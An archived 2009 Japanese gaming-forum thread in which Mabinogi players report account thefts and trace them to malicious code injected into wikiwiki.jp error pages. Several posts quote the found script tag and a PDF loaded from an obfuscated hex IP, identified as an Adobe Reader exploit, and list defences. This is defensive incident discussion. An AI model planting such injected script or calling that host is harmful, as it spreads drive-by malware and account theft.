【垢ハック】身の危険を感じる事柄について語るスレ3【ID漏洩】 - 1244363571

1：(*‘ω‘ *)オンライン：2009/06/07(日) 17:32:51 ID:JjkvmzXw0: アカウントハック関連の情報を交換するスレッドです

前スレ
【垢ハック】身の危険を感じる事柄について語るスレ2【ID漏洩】
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/10417/1243076373/

　----------報告用テンプレ----------
● 実際にアカウントハックを受けた/怪しいアドレスを踏んだ時の報告用

【　　　気付いた日時　　　　　】 (被害に気付いた日時)
【アカウント所持する他のネットゲーム】(ゲーム名とマビと共通のID/PASS使用の有無)
【　　ツールの使用の有無　　　】 (Yes/No、Yesの場合はそのToolの説明)
【　ネットカフェの利用の有無　　　】 (Yes/No)
【　アンチウイルスソフト】 (NortonInternetSecurity2007 等)
【ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見等)
【hostsファイルの変更】(有/無　[有りの場合は最終更新は何時ごろか])
【PeerGuardian2の導入】(有/無 [有りの場合は参照元サイトはどこか)
【ブラウザのパスワード管理機能の使用】(有/無 [オートコンプリートとか])
【説明】 (被害状況をできるかぎり詳しく書く。自分で気付いた点などもここに)
1010：(*‘ω‘ *)オンライン：2009/07/04(土) 03:39:14 ID:lKULLHTo0: 垢ハックのことを色々調べてみたんだが
広告にblogplayonlin.comに繋がるコードが埋め込まれてるみたいだね。
これに当たると一見403のページに飛ばされて何も無いように見えるけど
バックグラウンドでウイルス(キーロガー)がダウンロードされるらしい。

もしwikiを見ていて403のページに飛ばされた場合は相応の覚悟はしておいた方がいいかも。
1011：(*‘ω‘ *)オンライン：2009/07/04(土) 04:04:24 ID:trByTRpk0: まだウィルスとかトロイが原因だと思ってるアホがいるのかよｗｗ
1012：(*‘ω‘ *)オンライン：2009/07/04(土) 04:18:39 ID:WtKIAo860: >>1010
それってどの広告かわかります？
1013：(*‘ω‘ *)オンライン：2009/07/04(土) 04:24:33 ID:WtKIAo860: トップで＜＞何回押してもそれにあたらんなぁ。

>>1011
ウイルス等じゃなかったら原因はなんで？
サバクラック？
1014：(*‘ω‘ *)オンライン：2009/07/04(土) 05:18:40 ID:7h1Z4PbI0: 結局のとこどうなんだ。
順番待ちとかそういう状態ならある意味スパっとやめれるんだが。
公式で告知してくれんかなーまじで・・・ｗ
1015：(*‘ω‘ *)オンライン：2009/07/04(土) 06:02:26 ID:K.l2KxMg0: 情報が曖昧すぎるなぁ。
他のサイトに書かれていたことなら、そのURLを出して欲しいものだが。
1016：(*‘ω‘ *)オンライン：2009/07/04(土) 10:18:07 ID:XtUpfxkE0: 本スレでハクされた人が銀行PASSのお陰で銀行内ｾﾌｾﾌの報告あるね
1017：(*‘ω‘ *)オンライン：2009/07/04(土) 10:40:27 ID:SBEKNX7w0: 1日1鯖1～2垢が被害
ブルートフォースでもくらっとるのかね
1018：(*‘ω‘ *)オンライン：2009/07/04(土) 10:41:09 ID:LgNf1pLQ0: >広告にblogplayonlin.com

類似アドレスから考えるにFF11･･･？
FF11も垢ハクが多発してるし、その業者がマビに流れ込んだのだろうか･･･

ペットにも鍵をかけたいでござる
1019：(*‘ω‘ *)オンライン：2009/07/04(土) 11:27:04 ID:trByTRpk0: 韓国鯖でのアカハクの規約が変更されてるね。
ユーザからの報告があれば、調査と復旧に注力するそうです。
日本鯖にもきてくれないかな

-----------------------------------------------------------------------------
5-5アカウント盗用/ハッキング：新設

ゲーム利用者はアカウント盗用/ハッキング被害当時U-OTPを使用中で、事件発生後会員最初ゲーム接続
時点まで最大15日以内(公休日含む)関連調査を要請できます。事件発生日が分からない場合、
紛失したコンテンツ保有を最後に確認した日が該当日と見なされます。

アカウント盗用/ハッキング被害当時U-OTPイ・ヨンジュンではなかったり、アカウント盗用/ハッキング被害発生後、会員最初
ゲーム接続時点まで最大15日以内(公休日含む)受け取られなかった場合のアカウント盗用/ハッキング被害申告は
棄却されます。(ただ、一度棄却された受付件に対する再調査は不可能です。)

5-5アカウント盗用/ハッキング：削除

アカウント盗用/ハッキング申告取り下げ要請と申告時本人確認手続きが削除されます。

削除条項:
アカウント盗用/ハッキング申告取り下げ要請は最初申告後,30日以内(公休日含む)本人確認が完了しなければなりません。
取り下げ完了した件に対する再調査は不可能です。

会社はアカウント所有主が被害者本人であることを確認するために住民登録抄本あるいは国家公認身分証(住民登録証、
与党)の写本発送を要請します。

5-6復旧政策：新設

会社はアカウント盗用/ハッキングで発生した被害を最小化する事が出来るように復旧のために最善の努力をつくします。

アカウント盗用/ハッキング被害受付後、調査が完了してハッキング事実が確認される場合ハッキング発生時点のデータを
土台に復旧が成し遂げます。

5-6復旧政策：修正

アカウント管理の1次的責任は利用者にあって、したがって一部アカウント盗用/ハッキング復旧は復旧が不可能な場合が
あります。
1020：(*‘ω‘ *)オンライン：2009/07/04(土) 12:37:41 ID:gMG/cMTI0: あっちは色々後押しする法があるからなぁ…
1021：(*‘ω‘ *)オンライン：2009/07/04(土) 13:45:36 ID:popXOx6s0: ところで、wikiのトロイ騒動はどうなったんだ？
1022：(*‘ω‘ *)オンライン：2009/07/04(土) 14:49:28 ID:UPmXmLeY0: wikiでボコられたやつがwikiの悪評を広めようとするのは筋違いだと思うのだが
悪いのはwikiでなくボコられる原因となる発言をした自分自身であり
必要以上に口汚く罵ったヤツらなのだから…
1023：(*‘ω‘ *)オンライン：2009/07/04(土) 14:51:26 ID:d0Uvyp9Y0: >>1022
いきなり何を
1024：(*‘ω‘ *)オンライン：2009/07/04(土) 14:52:08 ID:popXOx6s0: 俺はトロイが駆除されたのかどうかを聞きたかったんだが…？
1025：(*‘ω‘ *)オンライン：2009/07/04(土) 14:53:20 ID:UPmXmLeY0: だからデマだっつーの
1026：(*‘ω‘ *)オンライン：2009/07/04(土) 14:54:30 ID:SBEKNX7w0: wikiが駆除されたかどうかはしらんがScript切ったらウィルス反応しなくなった
Wikiに仕込まれたというより広告に何かあったのかも知れぬ
1027：(*‘ω‘ *)オンライン：2009/07/04(土) 15:00:56 ID:popXOx6s0: >>1025
>>1026
なるほど、広告の方に何かあった訳か。
㌧クス
1028：(*‘ω‘ *)オンライン：2009/07/04(土) 15:18:38 ID:K.l2KxMg0: >>1026
どの広告に反応したとかわからないものなの？
1029：(*‘ω‘ *)オンライン：2009/07/04(土) 16:51:01 ID:YulljrHI0: >>1026
反応するのってバスターじゃない？
WIKIの広告はgoogleads.g.doubleclick.net使ってるから
バスターはこれに敏感とあるねぇ
1030：(*‘ω‘ *)オンライン：2009/07/04(土) 22:44:38 ID:6cG67eHU0: 横槍ですまないが>>1022をどう読めば>>1025になるんだろうか。
1031：(*‘ω‘ *)オンライン：2009/07/04(土) 22:56:08 ID:BmgTN3Xg0: Wikiでボコられた奴が逆恨みしてWikiにトロイが仕掛けられたとデマを流した、と読めるが？
しかしなんだな…それが事実なら一部マビノギプレイヤの民度って相当低いな→まるで、ではなくガキそのもの
1032：(*‘ω‘ *)オンライン：2009/07/04(土) 22:57:32 ID:peFFbwXY0: そりゃあ一部ていうならマビに限らずどこもそうだと思うんだが
1033：(*‘ω‘ *)オンライン：2009/07/05(日) 02:02:07 ID:.4EcrSMQ0: もっともすぎる
1034：(*‘ω‘ *)オンライン：2009/07/05(日) 02:04:17 ID:DiHD.9Eo0: >>1031
なにを言ってるんだかｗ
マビプレイヤーの半分以上は、ガキそのものでしょｗ
1035：(*‘ω‘ *)オンライン：2009/07/05(日) 02:17:48 ID:BOtm1l4Q0: 半分はＢＯＴだろう
1036：(*‘ω‘ *)オンライン：2009/07/05(日) 02:30:03 ID:fAWWLX920: 【　　　気付いた日時　　　　　】 7/5　1時
【アカウント所持する他のネットゲーム】マビのみで使用していたID・PW。PWは無意味な英数字8文字
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 No
【　アンチウイルスソフト】 McAfee
【ウイルススキャン結果】問題なし
【hostsファイルの変更】無　
【PeerGuardian2の導入】無
【ブラウザのパスワード管理機能の使用】有
【説明】
ほぼ一年間ぶりにログインしてみると最終ログイン日が7/3午前0時となっており
まさか･･･と入ってみると、精霊武器と改造鎧のみで銀行前におりました。
10数匹のペットに入れてあっためぼしい装備や財布は無くなり、銀行も残高が無く何もいじれなく（ロック？）なってました。
この一年間で数回公式からアカウントにログインした事とwikiを数回見た程度で、ハッキングの原因は不明です。

フレに何も告げずに休止していただけに、私でない何者かがこのキャラクターで何かしていたかと思うと･･･
こんな事って本当にあるんですねぇ。色々とオンラインゲームをやってきましたが初めてです;;
1037：(*‘ω‘ *)オンライン：2009/07/05(日) 02:54:48 ID:VQS4shGs0: >>1036
報告おつです
ｶｽﾍﾟﾙｵﾝﾗｲﾝｽｷｬﾝかspybot当たりのマルウェア検知をやってみて欲しい
にしても1年間放置の2日前にハックって計ったかのようなタイミングだなぁ…
1038：(*‘ω‘ *)オンライン：2009/07/05(日) 03:00:20 ID:I0BRlZGM0: >銀行も残高が無く何もいじれなく（ロック？）なってました。
何もいじれない銀行の残高知る方法kwsk
1039：(*‘ω‘ *)オンライン：2009/07/05(日) 03:03:30 ID:OsCQ3euI0: 次スレ立ててきた

【垢ハック】身の危険を感じる事柄について語るスレ4【ID漏洩】
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/10417/1246730469/
1040：(*‘ω‘ *)オンライン：2009/07/05(日) 03:07:29 ID:KvNGfA7Q0: >>811のアドレスさっきPG2で引っかかったので調べてみたんだけど
www.wikiwiki.jp■error■406.htmlでひっかかるわ
人柱さんよろしく
1041：(*‘ω‘ *)オンライン：2009/07/05(日) 03:09:42 ID:fAWWLX920: >>1038
銀行は勘違いでした。課金切れていじれなくなってただけでした。
一年ぶりなのですっかり忘れていました。
1042：(*‘ω‘ *)オンライン：2009/07/05(日) 03:10:51 ID:BxUEDn/U0: >>1040
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.wikiwiki.jp%2Ferror%2F406.html&hua=
ソースチェッカーで隠しjsを見たら
p://1856317799:888 pdf fk.pdfが呼ばれてた

…これ、もしかしてwikiwiki自体がヤバいんじゃね？
1043：(*‘ω‘ *)オンライン：2009/07/05(日) 04:02:30 ID:Qlycmd6w0: >>1042
404にも入っている

script src=Hxxp://0x6EA52967:888/jp.js
1044：(*‘ω‘ *)オンライン：2009/07/05(日) 04:44:17 ID:Zhjy2I3Q0: 1856317799=0x6EA52967=110.165.41.0
例のindexが素敵な香港サイトだね
PDFの中身も一緒
Adobe reader exploitCODEの脆弱性でbufferoverflow

[対策]
・Adobe readerの更新？/何番のexploitCODEか小生には読めないので、このexploitが最新readerで対応されてるのか詳しい人待ち
・acrobat javascript OFF/ttp://www29.atwiki.jp/geno/pages/19.html
・Adobe readerのアンインストール
・javascript、iframe OFF/各種ブラウザのオプションやアドオン等で設定/firefox+Noscript等
・IPフィルタ/110.165.32.0-110.165.63.255/ルータ、FW、フィルタリングソフト等
1045：(*‘ω‘ *)オンライン：2009/07/05(日) 04:46:26 ID:OkpJlKko0: >>1040
>>1042
>>1043
あのさー、それでなんでアカハクされる人とされない人が出てくるの？
1046：(*‘ω‘ *)オンライン：2009/07/05(日) 04:48:13 ID:BOtm1l4Q0: 順番待ちなだけなんじゃねーの
1047：(*‘ω‘ *)オンライン：2009/07/05(日) 04:48:51 ID:Uzk1VzBM0: swnjn
1048：(*‘ω‘ *)オンライン：2009/07/05(日) 05:02:14 ID:VQS4shGs0: エラー表示ページに埋め込まれてるって
マビwikiだけじゃなく、wikiwiki全部やばいってことだよねぇ
1049：(*‘ω‘ *)オンライン：2009/07/05(日) 05:04:50 ID:1G.aGakQ0: このウイルス自体は数年前の物だな
110.165～のアドレスは6/23が初出
googleでは6/27が最も古い（スレに貼られた日と同じ）
1050：(*‘ω‘ *)オンライン：2009/07/05(日) 05:44:47 ID:gx8wc76w0: とりあえずWIKIWIKIに通報するべきか？
1051：(*‘ω‘ *)オンライン：2009/07/05(日) 07:43:13 ID:eONnZpPc0: >>1045
今回のFlashとReaderの脆弱性を足りないおつむで調べてこいよ
1052：(*‘ω‘ *)オンライン：2009/07/05(日) 07:46:19 ID:TkiUAm5o0: それ以前の問題と思うがｗ
1053：(*‘ω‘ *)オンライン：2009/07/05(日) 09:59:33 ID:BLgm0Xz.0: 本スレの臭い物に蓋思考をこっちまで持ってくるなようぜえ
1054：(*‘ω‘ *)オンライン：2009/07/05(日) 10:36:12 ID:Qlycmd6w0: 次スレ行こう

次スレ
>>1039
1055：勝ち馬情報を簡単GET！：2010/02/18(木) 01:37:47 ID:zv6TRb/20: 空メを送るだけの簡単登録。
勿論登録は無料。しかし、その
情報力は競馬関係者も驚くほど。
この機会にあなたもいかが！
1056：(*‘ω‘ *)オンライン：2010/02/18(木) 10:21:31 ID:.07wZh8Q0: それ以前にどこに空メ送ればいいんだよｗ
1057：ご主人様にＫＩＳＳ　無料携帯ゲーム：2010/02/24(水) 17:31:55 ID:xSIBSl2A0: 「ご主人様にKISS　甘くせつないメイドラブストーリー」は恋愛ゲームです。この
ファンタジーを経験することにより、あなたの恋愛経験値はUP
1058：(*‘ω‘ *)オンライン：2010/02/24(水) 21:29:27 ID:AaV3iOSU0: 意味わかんねー
ハッカーの話題そらしかよ
こんなところに書き込んでないで、もっとメイドと甘くせつない恋愛でもしてろ！
がんばって恋愛経験値積むと次のストーリーに進めるぞｗ
1059：(*‘ω‘ *)オンライン：2010/02/24(水) 21:31:30 ID:AaV3iOSU0: 古いのあげんな！
さげろ！